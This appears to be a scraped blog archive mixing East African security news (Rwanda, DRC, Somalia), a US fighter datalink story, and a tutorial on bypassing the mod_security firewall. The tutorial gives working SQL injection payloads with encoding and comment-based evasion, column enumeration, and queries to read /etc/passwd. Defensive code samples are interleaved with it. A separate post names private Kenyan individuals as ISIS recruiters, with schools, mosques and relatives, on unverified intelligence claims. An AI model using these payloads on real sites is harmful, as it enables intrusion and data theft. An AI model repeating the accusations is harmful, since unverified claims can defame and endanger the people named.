Friday, December 17, 2021

RDF gets a deputy chief of military intelligence





The President of the Republic and Commander-in-Chief of the Rwandan Armed Forces, Paul Kagame, has appointed Col François Regis Gatarayiha the Deputy Commander-in-Chief of Military Intelligence, and has promoted officers to the rank of Lieutenant Colonel, of which 460 were Major. This is contained in a statement issued by the Ministry of Defense on Friday, December 17, 2021. The statement states that the President of the Republic and Commander-in-Chief of the Rwandan Armed Forces has appointed Col François Regis Gatarayiha as Deputy Commander-in-Chief, Military Intelligence Officer and Director of Technology. Col François Regis Gatarayiha, who has been the head of the National Immigration Service since 2018, had been promoted to Lieutenant Colonel in early September 2021, was then promoted to the rank of Colonel, and was immediately appointed Director of Communications and Information Security in the RDF. The statement from the Ministry of Defense also said that on Friday, President Kagame promoted 460 officers who held the rank of Major to Lieutenant Colonel. Other officers were promoted, including 472 who held the rank of Captain and were given the rank of Major. He also promoted 12,690 Private, Corporal and 2,836 Corporal.

The operation against ADF in the VIRUNGA


Backpacks on, machine guns slung over their shoulders, the infantry soldiers advance in the forest towards previously bombed sites, supposed to shelter ADF rebels hunted down in the northeast of the DRC by the Ugandan and Congolese armies.

"We will fight, until the supreme sacrifice ...", launches one of the young Congolese soldiers in fatigues in front of the cameras of a small handful of journalists, including one from AFP, who accompanied the army this week to northern Virunga National Park.

Just before, multiple rocket launchers had fired from the Semuliki military camp, a former UN base in the area, inside the park, where 15 Tanzanian peacekeepers were killed by ADF in 2017. Famous for its mountain gorillas, who live in its southern part, the park is also used as a rear base by various armed groups that have been raging in eastern Democratic Republic of the Congo for a quarter of a century, including the ADF in its northern part.

This is where a temporary joint HQ has been set up. Two generals, Ugandan Kayanja Muhanga and Congolese Bertin Mputela, discussed operations, while infantry from the Congolese jungle combat unit and the Ugandan mountain unit plunged into the forest.

The operation triggered on November 30 by the Ugandan air force and artillery against ADF rebel bases in eastern DRC is in its third week. No death or injury toll has been released; only a "preliminary" update made public on December 11 reported 34 “captured terrorists”, “4 enemy bivouacs destroyed” and “31 Congolese hostages freed.” The Ugandan army said earlier this week that “three additional enemy positions” had been targeted by air and artillery strikes.

After the first bombardments, which had targeted the north of the province of North Kivu and the south of Ituri, Ugandan troops on the ground entered Congolese territory by the border post of Nobili. ten km, time to repair the road in poor condition and open the way for heavy machinery.

- Collaborate with the army -

Captain Antony Mualushayi, spokesperson for the Armed Forces of the DRC (FARDC) in the region of Beni (North Kivu), estimated at the end of last week at "more or less 48 hours" the time still necessary to make the road practicable and to allow a large-scale ground operation in the Virunga. On Tuesday, at the HQ installed in the park, he welcomed the progress of the intervention against the ADF (Allied Democratic Forces), rebels accused of jihadist attacks on Ugandan soil and of repeated massacres of civilians in the DRC, where they have been established since 1995.

"The large-scale operations are advancing very well on the ground," he told reporters, asking the populations of the region "not to panic because of the heavy weapons."

At the same time, the Congolese coordinator of the operation, Major General Camille Bombele, arrived in Beni. On Wednesday he called on residents to seize "the outstretched hand" of Congolese President Félix Tshisekedi and Ugandan President Yoweri Museveni, who "agreed to join forces to impose peace" in the region. We must "collaborate with the army and the police," he told them.

North Kivu and Ituri have been under a state of siege since the beginning of May, an exceptional measure which gave full powers to the military but which has so far failed to stop the abuses of armed groups. The inhabitants, exhausted by years of killings and insecurity, have rather welcomed the intervention.

Thursday, December 16, 2021

DRC's High Military Court delivered its judgment on Wednesday, December 15, 2021 in the appeal case lodged by 8 FARDC officers sentenced at first instance on various charges. Among the first 5 cases submitted in court, one of the defendants, a Major accused of violating instructions, had his sentence reduced from 5 to 3 years, while Lieutenant Kibonge, prosecuted for murder, was sentenced to death and dismissed from the army. Colonel Nlandu was acquitted and released for lack of evidence. Four other officers prosecuted for embezzlement of public funds were each sentenced to 10 years of penal servitude before being permanently dismissed from the Armed Forces, noted my confidant who took part in the meeting. The 9 officers, 8 belonging to the army and another to the Congolese national police, had been apprehended since July 22, suspected of having diverted funds intended to finance operations during the state of siege, following a stay in Bunia of the inspector general of the FARDC, Army General Gabriel Amisi Kumba, accompanied by a large delegation.

ADF led a new incursion on the morning of this Thursday, December 16, 2021 on national route number 44 between the localities of Lukaya and Makumo, specifically in the Vingazi village of the Bangole group, Babila Babombi's chief in the territory of Mambasa and Ituri. Kasereka Sivamwenda of the local civil society, who warned of this incursion, put forward a provisional assessment of 8 massacred civilians and a vehicle loaded with stolen goods. "Out of a total of 5 people on the RN44 and we are alerted that the names were directed to the west of the RN 44 to Mekwata and there were already 3 bodies on site, which resulted in a total of 8 people." According to the same source, I would like to train from village to village, which endangers the population living in the localities of Mangonzi, Malikwanga and Mangila. Since the launch of joint military operations between the Congolese and Ugandan armies in the neighboring region of Beni in North Kivu, the ADF has established fire brigade, established their bastions in this forest area located between the territories of Mambasa and Irumu in Ituri. Several dozen civilians have already been abducted in this region where, despite the state of siege declared in May last, the army has struggled to clear the area of these terrorists.

The Al-Qaeda affiliated Al-Shabaab continues to make gains as the Somali government and its allies fall out. The Islamist militants reportedly captured a strategic town in the semi-autonomous central state of Galmudug.

 

The Al-Qaeda associated militant force has been able to conduct a string of incursions, underscoring that the group is making gains amid notable divisions between the Federal government and its allies in the region.

This trend has been notable for more than a decade: Al-Shabaab has been able to catapult its insurgency by capitalizing on deep political divisions in Somalia, and now the situation continues to deteriorate over long-delayed elections.

Corresponding military and local reports indicate that the militant group captured the town of Eldheere, about 30 km south of Galmudug’s capital Dhusamareb. Al-Shabaab fighters raided and bombed a police station before taking over the strategic town on December 14. Al-Shabaab operatives blew up the town’s police station, a military base, and other administrative buildings, and also kidnapped a trader, besides threatening a key regional road. Also, on Monday, December 13, Al-Shabaab fighters briefly took over the town of Mataban before it was recaptured by troops from Galmudug state, as per local sources.

The raids in Galmudug follow infighting between the Somali government and its erstwhile allies, Ahlu Sunnah Wal Jama’a (ASWJ), a Galmudug militia that was instrumental in the fight against Al-Shabaab. ASWJ says the government has accepted too many hardline clerics into its fold.

Intelligence analysts have severally warned of toxic political divisions in war-torn Somalia and now fear these political and geopolitical clashes will continue to derail the fight against Al-Shabaab.


Mohamed Abubakar aka Minshawary the chief Recruiter of ADF/islamic state central Africa is among the most wanted missing youths.

 

LET THIS BE AN ALERT TO ALL SECURITY AGENCIES  IN EAST AFRICA AND PEOPLE WORKING AT BORDER POINTS


In an effort to sketch the face of a jihadist, one notable point is that the mark of a terrorist is behavior, not ideology. One such case is Mohamed Abubakar aka Minshawary (a pseudonym on various HDCN), a 22 year old native male who is wanted in the Republic of Kenya over his links to terrorism, particularly for his close association with Salim Mohamed Rashid, a Mid-Level commander of the Islamic States Wilayaat Congo (IS-Central Africa Province), and his local associates including Abdulhakim Sagaar, Hashbel Karama aka Abu Ghuraba, a radicalizer at Masjid Jamia, and Jamal Din, a recruiter. Abubakar is believed to have been radical and extreme since his mid-teens, but his penchant for Jihad became insatiable when his childhood buddy Salim Mohamed Rashid went to DR Congo and in the recent past appeared in an ISCAP video proclaiming his forays doing Hijra.

Mohamed Abubakar is also a senior member of a youth network that exploits Masjid Musa Mosque located in Manjengo area of Mombasa, a coastal tourist city in Kenya, as a radicalization and recruitment center. Intelligence tracked and traced the network to Goma and Butembo in DR-Congo. A number of Kenyan youths from the Masjid Musa Mosque were last seen in the 2 cities after getting temporary unofficial-jobs as truckers. Abubakar recruited the youths and planned their logistics to DR-Congo by getting them temporary jobs as ‘turn-boys for trucks’ destined for Democratic Republic of Congo. Freight Forwarding companies owned by some Yemeni businessmen are often exploited during these terrorist operations. At Goma or Bukavu, they spend a night or two at specific Mosques where they are picked by ISCAP logisticians and moved to terrorists training camps in Beni deep in Kivu prefecture.

While authorities in Kenya are looking for the terror suspect over alleged links to the Al-Qaeda branch in Somalia, Harakat Shabaab al-Mujahideen, Mohamed Abubakar is a logistician for the Islamic States Central Africa Province (ISCAP) terrorist organization, the ISIS branch in DR-Congo. He is a member of a terrorist cell run and controlled by his old time friend and childhood buddy, Salim Mohamed Rashid, a thief turned jihadist who mastered how to assemble IEDs while still living in Mombasa. Abubakar claims he is a Swahili poet and a Nasheed artist working in the Swahili, Arabic and English languages, a perfect cover for symbol/coded communication.

The release of AbulHakim Sagaar may have had a significant socio-psychological impact on Abubakar, prompting him to perhaps think about achieving shahada. Fearing that his network has been compromised by either security intelligence services or the rival terrorist organization Al Shabaab, Mohamed Abubakar is potentially dangerous and, as intelligence socio-psychology experts warn, will go into sleeper cell mode and subsequently morph into a lone-wolf or make Hijra outside Kenya (in Somalia or DR-Congo).

According to intelligence experts, terrorism is not owned by a particular organization or ideology; rather, it’s a tactic deployed by anyone looking to use violence for some political or religious aim. “Abubakar created an audio visual production in form of a nasheed, in which he aspires to die a hero after inflicting heavy casualties on enemies of his ideology, an indicator he was preparing to conduct an attack at home or elsewhere”. He is a terrorist, and having not only government officials but everyday people understand that is key to catching additional would-be attackers before it’s too late.

TERRORISM! FROM THE MOSQUES AT EAST AFRICA COAST TO THE JUNGLES OF EASTERN DRC.

TERRORISM! FROM THE MOSQUES AT EASTAFRICA COAST TO THE JUNGLES OF EASTERN DRC.

 


In Mombasa, Mlango wa Papa Mosque is gradually but covertly being converted to an Islamic States ideology indoctrination center and a source of jihadists, an indicator the Al-Qaeda branch in Somalia, Harakat Al-Shabaab al Mujahideen has been badly outbid and routed out of its traditional East African coastal networks. The Mosque, a flashpoint during the Rogo and Makaburi heydays, is giving away youthful members to the Islamic States terrorist organization in the Democratic Republic of Congo (ISCAP DR-Congo).

The eyes of regional Counter Terrorism Operators are focused on Coastal Kenya following a string of suspect terror events traced back to Islamic States terrorist group sleeper cells. In Mid-August, 2021, Abdul Hakim Sagar, a Mombasa based Printer and Mosque official of Mlango wa Papa Mosque, was picked by counter terrorism operators. Intelligence warns that he, alongside Suleiman Mohamed who joined the Islamic States Congo Province group early 2020, is actively recruiting, facilitating hijra, and financing activities of the Islamic States terrorist group at the Mosque located in Old Town area. Sagar is a relative of Haniya Sagar Rogo, wife to the late Aboud Rogo, a notorious Al-Shabaab al Mujahideen recruiter, financier, and ideologue. Abdul-Hakim Sagar was one of Rogo’s best students and had a ‘Father-Son’ relationship with the rogue cleric. Abdul is believed to be a stalwart of the Rogo network. He has ensured patrons remained faithful to the cause and often swear fealty to the late ideologue.

According to intelligence analysts at S.I, there is a great deal of variety in the way Muslim youth at Old Town and neighboring places are being radicalized and recruited for ISCAP. The recruiters have consistently used the mosques, gyms and local Madrassa and Islamic associations as places to spot potential recruits. The recruits are then taken aside, away from the view of the community, and radicalized one-on-one or in small groups, then once indoctrinated are facilitated to travel to Congo and Mozambique.

Abdul Sagar has used his printing press to print radicalization material for the group and has kept close contact with Suleiman Mohamed via some specific high dimension communication networks (HDCN) including Facebook Messenger, Signal, Telegram, and 2 other popular encrypted chat platforms, some of which are often recommended by Jihadist Cyber teams. Abdul has also kept covert communication with Nasra Mohamed, an Islamic States sympathizer from Mombasa. Nasra is the sister in-law to Mombasa politician, Mohamed Sagar another relative of Abdul Hakim Sagar. Nasra has been to Syria where she served the Daesh. Intelligence collected by S.I confirms Nasra’s Hijra was facilitated by Abdul Hakim Sagar. Nasra was intercepted by Counter Terrorism officials multiple times in her attempts to travel to Turkey, Oman, Syria, Egypt, and Libya. Dubai immigration officials denied her a Visa after she appeared on the INTERPOL red-list and intelligence reports.

S.I and security services have repeatedly warned about domestic terrorists and grassroots jihadists. The Kenyan homeland will face a persistent and evolving terrorist threat over time. The main threat comes from al-Shabaab Mujahideen, driven by their undiminished intent to attack Kenya and a continued effort by these terrorist groups to adapt and improve their capability, besides the new ISIS outfit in East and Central Africa whose original birthplace was Coastal Kenya (Ref: Al Muhajiroun). The threat of ISCAP attacks in Kenya is high, and as such the Republic of Kenya is currently in a heightened threat environment.

Despite recent counter terrorism successes, the threat of attacks will remain high over time. Terrorist attacks do not occur in a vacuum; rather, they are the result of a methodical process, which makes perpetrators vulnerable to detection each step of the way, and this is how Abdul Hakim Sagar and his associates have been outed. Because of this, it is important to focus on indications that attacks are being planned regardless of the actor’s race, ethnicity or ideological bent in an effort to prevent future atrocities. Abdul Hakim Sagar's accomplices have caused their families great pain and incurred them significant financial loss. Hakim Saggar and his relatives were involved in violent skirmishes at the Mlango wa Papa Mosque as they attempted to eject the Sufi leadership in favor of violent Wahhabi ideologues. The Saggars want the Islamic States to support their jihad project in Mombasa; this would mean massive financial support which would eventually give them sociopolitical and religious power in the Coastal tourist city and beyond.

SOME KEY FIGURES OF ISLAMIC STATE TERRORISTS OUR INTELLIGENCE AND LOCAL COMMUNITIES MUST BE AWARE OF! MAKE SURE THEY DO NOT HAVE THEIR NETWORKS INSIDE OUR TOWNS, VILLAGES AND MOSQUES.

 

1. Abdul Hakim Sagar is a Mombasa based Printer and Mosque official of Mlango wa Papa Mosque. Intelligence warns that, him, alongside Suleiman Mohamed who joined the Islamic States Congo Province group early 2020, are actively recruiting, facilitating hijra, and financing activities of the Islamic States terrorist group at the Mosque located in Old Town area. Sagar is a relative of Haniya Sagar Rogo, wife to the late Aboud Rogo, a notorious Al-Shabaab al Mujahideen recruiter, financier, and ideologue. Abdul-Hakim Sagar was one of Rogo’s best students and had a ‘Father-Son’ relationship with the rogue cleric. Abdul is believed to be a stalwart of the Rogo network, He has ensured patrons remained faithful to the cause and often swear fealty to the late ideologue.

According to intelligence analysts, there is a great deal of variety in the way Muslims youth at Old Town and neighboring places are being radicalized and recruited for ISCAP. The recruiters have consistently used the mosques, gyms and local Madrassa and Islamic associations as places to spot potential recruits. The recruits are then taken aside, away from the view of the community, and radicalized one-on-one or in small groups then once indoctrinated are facilitated to travel to Congo and Mozambique.

Abdul Sagar has used his printing press to print radicalization material for the group and has kept close contact with Suleiman Mohamed via some specific high dimension communication networks (HDCN) including Facebook Messenger, Signal, Telegram, and 2 other popular encrypted chat platforms, some of which are often recommended by Jihadist Cyber teams. Abdul has also kept covert communication with Nasra Mohamed, an Islamic States sympathizer from Mombasa.

2. Nasra Mohamed, an Islamic States sympathizer from Mombasa. Nasra is the sister in-law to Mombasa politician, Mohamed Sagar another relative of Abdul Hakim Sagar. Nasra has been to Syria where she served the Daesh. Intelligence Information confirms Nasra’s Hijra was facilitated by Abdul Hakim Sagar. Nasra was intercepted by Counter Terrorism officials multiple times in her attempts to travel to Turkey, Oman, Syria, Egypt, and Libya. Dubai immigration officials denied her a Visa after she appeared on the INTERPOL red-list and intelligence reports.

3. Muhammad Abubakar Said aka Minshawary (a pseudonym on various social media platforms), a 22 year old native of Kenya, precisely from Kibokoni, is wanted in the Republic of Kenya over his links to terrorism. Abubakar is believed to have been radical and extreme since his mid-teens, but his penchant for Jihad became insatiable when his childhood buddy Salim Mohamed Rashid went to DR Congo and in the recent past appeared in an ISCAP video proclaiming his forays doing hijra.

Mohamed Abubakar went to Liwatoni Muslim School and is currently a student at Ummah University pursuing a Diploma in Business Management. He is also a senior member of a youth network that exploits Masjid Musa Mosque located in Manjengo area of Mombasa, a coastal tourist city in Kenya, as a radicalization and recruitment center, with a tracked and traced network to Goma and Butembo in DR-Congo. A number of Kenyan youths from the Masjid Musa Mosque were last seen in the 2 cities after getting temporary unofficial jobs as truckers. Abubakar recruited the youths and planned their logistics to DR-Congo by getting them temporary jobs as ‘turn-boys for trucks’ destined for Democratic Republic of Congo. Freight Forwarding companies owned by some Yemeni businessmen are often exploited during these terrorist operations. At Goma or Bukavu, they spend a night or two at specific Mosques where they are picked by ISCAP logisticians and moved to terrorist training camps in Beni deep in Kivu prefecture.

While authorities in Kenya are looking for the terror suspect over alleged links to the Al-Qaeda branch in Somalia, Harakat Shabaab al-Mujahideen, Mohamed Abubakar is a logistician for the Islamic States Central Africa Province (ISCAP) terrorist organization, the ISIS branch in DR-Congo. He is a member of a terrorist cell run and controlled by his old time friend and childhood buddy, Salim Mohamed Rashid. Abubakar claims he is a Swahili poet and a Nasheed artist working in the Swahili, Arabic and English languages, a perfect cover for symbol/coded communication.

4. Salim Mohamed Rashid aka chotara is a thief who turned into a jihadist running a network of terror cells, a Mid-Level commander of the Islamic States Wilayaat Congo (IS-Central Africa Province). Rashid mastered the art of assembling IEDs when he was still living in Mombasa.

5. Others are Hashbel Karama aka Abu Ghuraba, a radicalizer at Masjid Jamia, and Jamal Din, a recruiter.


Monday, December 21, 2020

Will US F22 and F35 be able to stealthily communicate during sky operations?

The latest test of the gatewayONE communication system, developed to allow the F22 and F35 to communicate with each other and transfer mission data without being spotted, failed, but the Pentagon still believes it is on the right track to make the two fighters work together.

According to US Air Force acquisition executive Will Roper, the trial on 9 December at the Yuma Proving Ground in Arizona, managed to fulfill half of the tasks set before it. However, the gatewayONE module mounted on an unmanned Kratos XQ-58A Valkyrie drone flying alongside the two jets "lost connectivity" soon after take-off. The preliminary version is that some of the module's hardware was displaced or came loose during lift-off.

"We think we had a connector that came loose during it because the gateway itself was fine when the Valkyrie landed. So [it's] a thing we've learned from and we'll fix next time […] Next time we get out, flying in the next on-ramp, we'll probably check those soldering points more than one time", Will Roper said.

The Air Force believes the gatewayONE will be able to give the necessary connectivity between the newest jet and its predecessor, but admits the proof of concept might be months away due to the setbacks in the last trial. Nonetheless, the 9 December test gave some promising results: namely, a second gatewayONE module on the ground managed to transfer some of the data, such as targeting cues, between the F-22 and F-35 in the skies. However, it never managed to transfer all the information it was supposed to.

The Pentagon initially considered installing a similar module, called the Advanced Battle Management System, directly on the jets to enable direct connectivity between the fourth and the fifth-generation fighters, and even ran the first test in 2019. According to defence officials, the two jets managed to exchange data using radio systems built by the respective contractors who modelled the original jets, Lockheed Martin and Northrop Grumman.

However, the Pentagon has since seemingly abandoned the idea in favour of an autonomous drone-mounted system. While normally with the introduction of new communication standards or data links the older machines are retrofitted with compatible equipment, such an operation could prove both costly and time-consuming, when it comes to an extensive fleet of nearly 190 American F-22 fighters. Air Force Chief Architect Preston Dunlap suggested during a conference with the press on 16 December, that using low-cost and expendable drones to fill in the communications gap between the two generations of jets might be a better approach.

Sunday, December 20, 2020

How to bypass mod_security (WAF)

 




What is Mod_security?

ModSecurity is an embeddable web application firewall under GNU license that runs as a module of the Apache web server. It provides protection against various attacks on web applications and allows monitoring of HTTP traffic, as well as real-time analysis, without the need to change the existing infrastructure. ModSecurity filters attacks such as XSS, SQL injection, abnormal protocol behavior, robots, Trojans and LFI, and also incorporates specific rules for some of the most popular content managers such as Joomla or WordPress.

Now we go through the steps. The first thing to do is look for parameters on the website and test them. As you already know, a quick and useful test is to add a single quote (') after the value of a parameter to generate a database error and find out whether or not the page is vulnerable to SQL injection.

I found a parameter called “productid” and a single quote was added to the end of its value. As a result, the page showed the error:

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’


This means that the page is vulnerable to SQL injection.

At this point we proceed to perform the injection, starting with a simple payload as the first attempt:

-1+union+select+1+--+
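The root cause behind that error message, as an added example that is not part of the original post: the `productid` value is concatenated into the SQL text, so a quote changes the statement's grammar. The table, the sample rows, the function names and the use of SQLite in place of MySQL are assumptions made so the example runs offline.

```python
import sqlite3


def make_db():
    # Constructed sample data: the real site's schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "lamp"), (2, "desk")])
    return db


def lookup_vulnerable(db, productid):
    # Request text is pasted into the statement, so a quote or a UNION in
    # productid becomes part of the SQL grammar.
    sql = "SELECT id, name FROM products WHERE id = " + productid
    return db.execute(sql).fetchall()


def lookup_safe(db, productid):
    # 1) Reject anything that is not an integer before touching the database.
    # 2) Bind the value as a parameter so it can never be parsed as SQL.
    try:
        pid = int(productid)
    except ValueError:
        return []
    return db.execute("SELECT id, name FROM products WHERE id = ?",
                      (pid,)).fetchall()


def probe(db, lookup, value):
    # Return what a client could observe: result rows or a database error.
    try:
        return ("rows", lookup(db, value))
    except sqlite3.Error as exc:
        return ("db-error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for value in ["2", "1'", "-1 union select 1"]:
        print(repr(value),
              probe(db, lookup_vulnerable, value),
              probe(db, lookup_safe, value))
```

With the parameterized lookup neither the syntax error nor the column-count error can be provoked, so the WAF is no longer the only control standing between the request and the database.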

As a result of the above we have the following:


The site is protected by Mod_security.

The next step is to try different injection syntaxes and encoding methods for SQL injection.

I personally feel more comfortable with the following syntax:

-1+union(select+1)+--+

Then I tried mixing upper and lower case:


but with the same result.

I also tried using URL encoding:

-1+%55nIoN(%53EleCt+1)+--+


Double and triple URL encoding

%2555nIoN%28%2553EleCt%2B1%29

%252555nIoN%2528%252553EleCt%252B1%2529

But it didn’t work out.

Finally I decided to stick with a single URL encoding, using this payload:

-1+%55nIoN(%53EleCt+1)+--+

The next step was to mix in comment encoding:

-1+/*!12345%55nIoN*//**/(/*!12345%53EleCt*//**/1)+--+


And done! With this we bypass the WAF filters.

The page now shows us the following message:

“The used SELECT statements have a different number of columns”

With this we will find out the number of columns on the page:

In this case there are 24 columns, of which number 5 is vulnerable:

-1+/*!12345UnIoN*//**/(/*!12345SEleCt*//**/ 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24)+--+

The next thing is to get information. For this I will use one of my own resources, which lists the different ways to extract basic information from a database. The complete information is at the following link:
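Why the comment-wrapped payload passed while the earlier ones were blocked, seen from the filter's side, as an added example (not from the original post and not ModSecurity's own rules): MySQL executes the body of a `/*! ... */` comment, so a filter that matches the decoded text alone, or that throws comments away whole, inspects something different from what the database runs. The signature, the function names and the decode limit are assumptions made for the illustration; the sample inputs are the payloads quoted above.

```python
import re
from urllib.parse import unquote_plus

# One hypothetical signature, used by both checks so that the only
# difference between them is the normalization applied first.
SIGNATURE = re.compile(
    r"\bunion\b[\s(]*(?:(?:all|distinct)\b[\s(]*)?\bselect\b", re.I)

# MySQL runs the body of /*! ... */ (optionally prefixed by a version
# number), so the body must be kept and only the wrapper removed.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary comments act as whitespace between tokens.
PLAIN = re.compile(r"/\*.*?\*/", re.S)


def normalize(raw, max_rounds=3):
    """Reduce a parameter value to roughly what the SQL parser will see."""
    text = raw
    for _ in range(max_rounds):          # undo layered URL encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = VERSIONED.sub(r" \1 ", text)  # unwrap executable comments
    text = PLAIN.sub(" ", text)          # drop ordinary comments
    return re.sub(r"\s+", " ", text.lower()).strip()


def match_decoded_only(raw):
    # Weak check: a single URL decode, then the signature.
    return bool(SIGNATURE.search(unquote_plus(raw)))


def match_normalized(raw):
    # Stronger check: full normalization, then the same signature.
    return bool(SIGNATURE.search(normalize(raw)))


# Inputs taken from the walkthrough above, plus one constructed benign value.
PLAIN_UNION = "-1+union+select+1+--+"
ENCODED = "-1+%55nIoN(%53EleCt+1)+--+"
DOUBLE_ENCODED = "%2555nIoN%28%2553EleCt%2B1%29"
COMMENT_WRAPPED = "-1+/*!12345%55nIoN*//**/(/*!12345%53EleCt*//**/1)+--+"
BENIGN = "credit union selection guide"      # constructed sample

if __name__ == "__main__":
    for value in (PLAIN_UNION, ENCODED, DOUBLE_ENCODED,
                  COMMENT_WRAPPED, BENIGN):
        print(f"{value!r}: decoded-only={match_decoded_only(value)} "
              f"normalized={match_normalized(value)} -> {normalize(value)!r}")
```

In ModSecurity the comparable rule transformations are `t:urlDecodeUni`, `t:lowercase` and `t:compressWhitespace`; `t:replaceComments` replaces a whole comment, body included, with a space, so the `/*!` form needs a rule of its own. Request normalization stays a compensating control, and the durable fix is the parameterized query.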

https://github.com/Y000o/sql_injection_basic/blob/master/sql_injection_basic_en.md

| Purpose | Query | Result |
|---|---|---|
| Version | SELECT @@version or SELECT version() | gives us the version of the database |
| Current User | SELECT user() or SELECT system_user() | gives us the user we have |
| List Users | SELECT user FROM mysql.user | shows us all users |
| Database | SELECT database() | shows us the database we are in |
| List databases | SELECT schema_name FROM information_schema.schemata | shows us the databases |
| List tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' | shows us the tables of the chosen database |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' | shows us the columns of the chosen table |
| Local File Access | UNION ALL SELECT LOAD_FILE('/etc/passwd') | if possible, lets us read system files |
| DB location | SELECT @@datadir | shows us the directory where the database is installed |

Finally, I will leave a list of payloads that may help:



The core, dangerous and malicious strategies of ISIS our Moslem communities in Uganda should be careful of.

  From its emergence to the present day, ISIS has heavily invested in and operated through three core strategies, which elucidate the founda...